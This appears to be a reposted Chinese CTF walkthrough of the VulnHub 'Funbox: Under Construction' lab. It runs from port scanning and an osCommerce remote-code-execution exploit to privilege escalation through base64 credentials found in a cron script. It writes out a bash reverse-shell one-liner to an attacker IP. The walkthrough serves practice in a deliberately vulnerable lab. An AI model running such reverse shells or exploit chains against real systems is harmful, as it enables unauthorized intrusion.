首页百科大全正文内容

vulnhub Funbox: Under Construction

百科大全

更新时间：2025-10-05 10:52:1545

admin管理员组
文章数量:1794759

vulnhub Funbox: Under Construction

vulnhub Funbox: Under Construction

环境搭建：

Funbox: Under Construction! ~ vulnhub

漏洞复现：

探测靶机的IP地址

nmap进行探测靶机的服务和端口

访问80端口

dirb扫描目录，发现catalog目录

访问一下，发现是个oscommerce的网站

查看版本的漏洞，发现命令执行漏洞

查看该文件，如果执行成功，会返回当前目录的文件

修改为靶机的IP

运行脚本

访问文件，得到回显

修改命令

bash -c "exec bash -i &>/dev/tcp/192.168.226.128/1111 <&1"

查看全局变量，查看执行文件都没发现可以利用

下载pspy64s

wget github/DominicBreuker/pspy/releases/download/v1.2.0/pspy64s

kali开启python服务，靶机进行下载

修改权限，进行执行

发现会执行一个脚本文件

发现一个base64语句

进行解密，发现账号密码

切换用户登录，要升级shell模式，不然不可以切换用户

查看目录下的flag

本文标签： Vulnhub FUNBOX Construction

版权声明：本文标题：vulnhub Funbox: Under Construction 内容由林淑君副主任自发贡献，该文观点仅代表作者本人，转载请联系作者并注明出处：http://www.xiehuijuan.com/baike/1686508791a75516.html，本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容，一经查实，本站将立刻删除。

更多相关文章

[网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS

百科大全

[网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS

2023-6-11

[网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS

ArcMap10.2 Construction Tools(构造工具)以及&quot;捕捉&quot;工具的使用

百科大全

ArcMap10.2 Construction Tools(构造工具)以及&quot;捕捉&quot;工具的使用

2023-6-12

ArcMap10.2 Construction Tools(构造工具)以及"捕捉&quot

composite construction

百科大全

composite construction

2023-6-12

composite construction

SC Chapter 1:Views and Quality Objectives of Software Construction Review

百科大全

SC Chapter 1:Views and Quality Objectives of Software Construction Review

2023-6-12

SC Chapter 1:Views and Quality Objectives of Softw

java.lang.RuntimeException: Exception during suite construction

百科大全

java.lang.RuntimeException: Exception during suite construction

2023-6-12

java.lang.RuntimeException: Exception during suite

poj3352——Road Construction（双连通分量）

百科大全

poj3352——Road Construction（双连通分量）

2023-6-12

poj3352——Road Construction（双连通分量）

09. Never call virtual funcitons during construction or destruction

百科大全

09. Never call virtual funcitons during construction or destruction

2023-6-12

09. Never call virtual funcitons during constructi

PickleException: expected zero arguments for construction of ClassDict (for numpy.dtype)

百科大全

PickleException: expected zero arguments for construction of ClassDict (for numpy.dtype)

2023-6-12

PickleException: expected zero arguments for const

Aizu 2249 Road Construction

百科大全

Aizu 2249 Road Construction

2023-6-12

Aizu 2249 Road Construction

Hbase master启动报错：Failed construction of Master: class org.apache.hadoop.hbase.master.HMasterCaused

百科大全

Hbase master启动报错：Failed construction of Master: class org.apache.hadoop.hbase.master.HMasterCaused

2023-6-12

Hbase master启动报错：Failed construction of Master: cl

[C++] 关于构造函数(construction) 析构函数(destruction)中调用虚函数

百科大全

[C++] 关于构造函数(construction) 析构函数(destruction)中调用虚函数

2023-6-12

[C++] 关于构造函数(construction) 析构函数(destruction)中调用虚函

CF #769 B.Roof Construction

百科大全

CF #769 B.Roof Construction

2023-6-12

CF #769 B.Roof Construction

intellij idea cannot resolve property under construction in mybatis

百科大全

intellij idea cannot resolve property under construction in mybatis

2023-6-12

intellij idea cannot resolve property under constr

状语从句到独立结构(absolute construction )

百科大全

状语从句到独立结构(absolute construction )

2023-6-12

状语从句到独立结构(absolute construction )

PetroKG: Construction and Application of Knowledge Graph in Upstream Area of PetroChina

百科大全

PetroKG: Construction and Application of Knowledge Graph in Upstream Area of PetroChina

2023-6-12

PetroKG: Construction and Application of Knowledge

vulnhub Funbox: Under Construction

百科大全

vulnhub Funbox: Under Construction

2023-6-12

vulnhub Funbox: Under Construction

使用VESTA构建wulff construction

百科大全

使用VESTA构建wulff construction

2023-6-12

使用VESTA构建wulff construction

Failed construction RegionServer 解决方案

百科大全

Failed construction RegionServer 解决方案

2023-6-12

Failed construction RegionServer 解决方案

regionserver.HRegionServer: Failed construction RegionServer

百科大全

regionserver.HRegionServer: Failed construction RegionServer

2023-6-12

regionserver.HRegionServer: Failed construction Re

《Automation in Construction》期刊介绍（SCI 2区）

百科大全

《Automation in Construction》期刊介绍（SCI 2区）

2023-6-12

《Automation in Construction》期刊介绍（SCI 2区）

发表评论

全部评论 0

暂无评论

推荐文章

完全入门C语言

完全入门C语言

如何调用gitee仓库真实图片链接

如何调用gitee仓库真实图片链接

java JWT：JSON Web Token 详解

java JWT：JSON Web Token 详解

Spring IOC与AOP事务底层原理及源码核心点解析

Spring IOC与AOP事务底层原理及源码核心点解析

【Linux】模拟实现一个shell

【Linux】模拟实现一个shell

最新文章

Linux系统之jobs命令的基本使用
1月前
手把手教学！简单上手“AI复活”技术
1月前
单细胞Seruat和h5ad数据格式互换(R与python)方法学习和整理
1月前
JVM专题
1月前
学会5个图表，让数据分析简洁高效
1月前
写“藤”的作文1200字
6月前
有关于进步的作文
6月前
幼儿园见习报告
6月前
语数英寒假作业上册答案五年级
6月前
伊索寓言经典语词句摘抄
6月前